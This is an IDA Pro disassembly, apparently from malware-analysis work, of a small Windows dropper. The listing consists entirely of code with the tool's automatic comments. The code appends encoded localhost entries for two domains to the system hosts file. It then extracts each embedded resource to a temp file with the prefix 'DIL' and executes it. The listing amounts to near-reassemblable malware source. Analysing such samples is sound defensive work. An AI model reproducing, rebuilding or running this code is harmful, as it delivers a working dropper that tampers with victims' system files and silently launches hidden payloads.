;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 11DB3F85EDCF2406FF81705D9B8F46CC
; File Name : u:\work\11db3f85edcf2406ff81705d9b8f46cc_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000226 ( 550.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00000400
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; char String2[]
String2 db '\DRIVERS\ETC',0 ; DATA XREF: start+18�o
; char aHosts[]
aHosts db '\HOSTS',0 ; DATA XREF: start:loc_40108A�o
; char PrefixString[]
PrefixString db 'DIL',0 ; DATA XREF: start+D9�o
dword_401018 dd 32310A0Dh, 2E302E37h, 20312E30h, 2E326C64h, 6E656574h
; DATA XREF: start+7F�o
dd 73736170h, 2E656761h, 0D6D6F63h, 3732310Ah, 302E302Eh
dd 6E20312Eh, 6E726B74h, 2E61706Ch, 6F666E69h
db 0Dh, 0Ah
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
call GetVersion ; GetVersion
test eax, eax
js short loc_40107B
push 104h ; uSize
push offset StartupInfo ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
push offset String2 ; "\\DRIVERS\\ETC"
push offset StartupInfo ; lpString1
call lstrcatA ; lstrcatA
jmp short loc_40108A
; ---------------------------------------------------------------------------
loc_40107B: ; CODE XREF: start+7�j
push 104h ; uSize
push offset StartupInfo ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
loc_40108A: ; CODE XREF: start+27�j
push offset aHosts ; "\\HOSTS"
push offset StartupInfo ; lpString1
call lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
push offset StartupInfo ; lpFileName
call CreateFileA ; CreateFileA
mov edi, eax
cmp eax, 0FFFFFFFFh
jz short loc_4010E2
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push edi ; hFile
call SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
push 3Ah ; nNumberOfBytesToWrite
push offset dword_401018 ; lpBuffer
push edi ; hFile
call WriteFile ; WriteFile
push edi ; hObject
call CloseHandle ; CloseHandle
loc_4010E2: ; CODE XREF: start+65�j
mov lpName, 1
loc_4010EC: ; CODE XREF: start+161�j
push 0Ah ; lpType
push lpName ; lpName
push 0 ; hModule
call FindResourceA ; FindResourceA
test eax, eax
mov ebp, eax
jz loc_4011B8
push ebp ; hResInfo
push 0 ; hModule
call LoadResource ; LoadResource
push eax ; hResData
call LockResource ; LockResource
mov esi, eax
push offset StartupInfo ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA ; GetTempPathA
push offset ApplicationName ; lpTempFileName
push 0 ; uUnique
push offset PrefixString ; "DIL"
push offset StartupInfo ; lpPathName
call GetTempFileNameA ; GetTempFileNameA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
push offset ApplicationName ; lpFileName
call CreateFileA ; CreateFileA
mov edi, eax
cmp eax, 0FFFFFFFFh
jz short loc_4011AD
push ebp ; hResInfo
push 0 ; hModule
call SizeofResource ; SizeofResource
push 0 ; lpOverlapped
push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
push eax ; nNumberOfBytesToWrite
push esi ; lpBuffer
push edi ; hFile
call WriteFile ; WriteFile
push edi ; hObject
call CloseHandle ; CloseHandle
mov StartupInfo.cb, 44h
push offset StartupInfo ; lpStartupInfo
call GetStartupInfoA ; GetStartupInfoA
push offset ProcessInformation ; lpProcessInformation
push offset StartupInfo ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 0 ; dwCreationFlags
push 0 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
push 0 ; lpCommandLine
push offset ApplicationName ; lpApplicationName
call CreateProcessA ; CreateProcessA
loc_4011AD: ; CODE XREF: start+106�j
inc lpName
jmp loc_4010EC
; ---------------------------------------------------------------------------
loc_4011B8: ; CODE XREF: start+AD�j
push 0 ; uExitCode
call ExitProcess ; ExitProcess
start endp
; ---------------------------------------------------------------------------
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateProcessA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION FindResourceA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetStartupInfoA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetSystemDirectoryA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempFileNameA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempPathA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetVersion. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetWindowsDirectoryA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LoadResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LockResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION SetFilePointer. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION SizeofResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION lstrcatA. PRESS KEYPAD "+" TO EXPAND]
align 200h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000001E0 ( 480.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00000800
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn __imp_CreateFileA:dword ; DATA XREF: CreateFileA�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn __imp_CreateProcessA:dword ; DATA XREF: CreateProcessA�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
; HRSRC __stdcall FindResourceA(HMODULE hModule,LPCSTR lpName,LPCSTR lpType)
extrn __imp_FindResourceA:dword ; DATA XREF: FindResourceA�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn __imp_GetStartupInfoA:dword ; DATA XREF: GetStartupInfoA�r
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn __imp_GetSystemDirectoryA:dword ; DATA XREF: GetSystemDirectoryA�r
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn __imp_GetTempFileNameA:dword ; DATA XREF: GetTempFileNameA�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn __imp_GetTempPathA:dword ; DATA XREF: GetTempPathA�r
; DWORD __stdcall GetVersion()
extrn __imp_GetVersion:dword ; DATA XREF: GetVersion�r
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn __imp_GetWindowsDirectoryA:dword ; DATA XREF: GetWindowsDirectoryA�r
; HGLOBAL __stdcall LoadResource(HMODULE hModule,HRSRC hResInfo)
extrn __imp_LoadResource:dword ; DATA XREF: LoadResource�r
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn __imp_LockResource:dword ; DATA XREF: LockResource�r
; DWORD __stdcall SetFilePointer(HANDLE hFile,LONG lDistanceToMove,PLONG lpDistanceToMoveHigh,DWORD dwMoveMethod)
extrn __imp_SetFilePointer:dword ; DATA XREF: SetFilePointer�r
; DWORD __stdcall SizeofResource(HMODULE hModule,HRSRC hResInfo)
extrn __imp_SizeofResource:dword ; DATA XREF: SizeofResource�r
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn __imp_WriteFile:dword ; DATA XREF: WriteFile�r
; LPSTR __stdcall lstrcatA(LPSTR lpString1,LPCSTR lpString2)
extrn __imp_lstrcatA:dword ; DATA XREF: lstrcatA�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 402048h
dd 2070h, 2 dup(0)
dd 21D2h, 2000h, 5 dup(0)
dd 20B8h, 20C6h, 20D4h, 20E6h, 20F4h, 2104h, 2116h, 212Ch
dd 2140h, 2150h, 215Eh, 2176h, 2186h, 2196h, 21A8h, 21BAh
dd 21C6h, 0
dd 6C430019h, 4865736Fh, 6C646E61h, 320065h, 61657243h
dd 69466574h, 41656Ch, 72430042h, 65746165h, 636F7250h
dd 41737365h, 750000h, 74697845h, 636F7250h, 737365h, 69460093h
dd 6552646Eh, 72756F73h, 416563h, 6547013Bh, 61745374h
dd 70757472h, 6F666E49h, 1440041h
aGetsystemdirec db 'GetSystemDirectoryA',0
dd 6547014Eh, 6D655474h, 6C694670h, 6D614E65h, 4165h, 65470150h
dd 6D655474h, 74615070h, 4168h, 6547015Fh, 72655674h, 6E6F6973h
dd 1640000h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
dw 1AEh
aLoadresource db 'LoadResource',0
align 2
dw 1BCh
aLockresource db 'LockResource',0
align 2
dw 24Bh
aSetfilepointer db 'SetFilePointer',0
align 4
dd 69530272h, 666F657Ah, 6F736552h, 65637275h, 2B90000h
dd 74697257h, 6C694665h, 2D30065h, 7274736Ch, 41746163h
dd 454B0000h, 4C454E52h, 642E3233h, 6C6Ch, 8 dup(0)
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 00000220 ( 544.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
; DWORD NumberOfBytesWritten
NumberOfBytesWritten dd ? ; DATA XREF: start+75�o start+112�o
; LPCSTR lpName
lpName dd ? ; DATA XREF: start:loc_4010E2�w
; start+9C�r ...
; struct _STARTUPINFOA StartupInfo
StartupInfo _STARTUPINFOA <?> ; DATA XREF: start+E�o start+1D�o ...
dd 30h dup(?)
; char ApplicationName[]
ApplicationName db 104h dup(?) ; DATA XREF: start+D2�o start+F7�o ...
; struct _PROCESS_INFORMATION ProcessInformation
ProcessInformation _PROCESS_INFORMATION <?> ; DATA XREF: start+139�o
_data ends
end start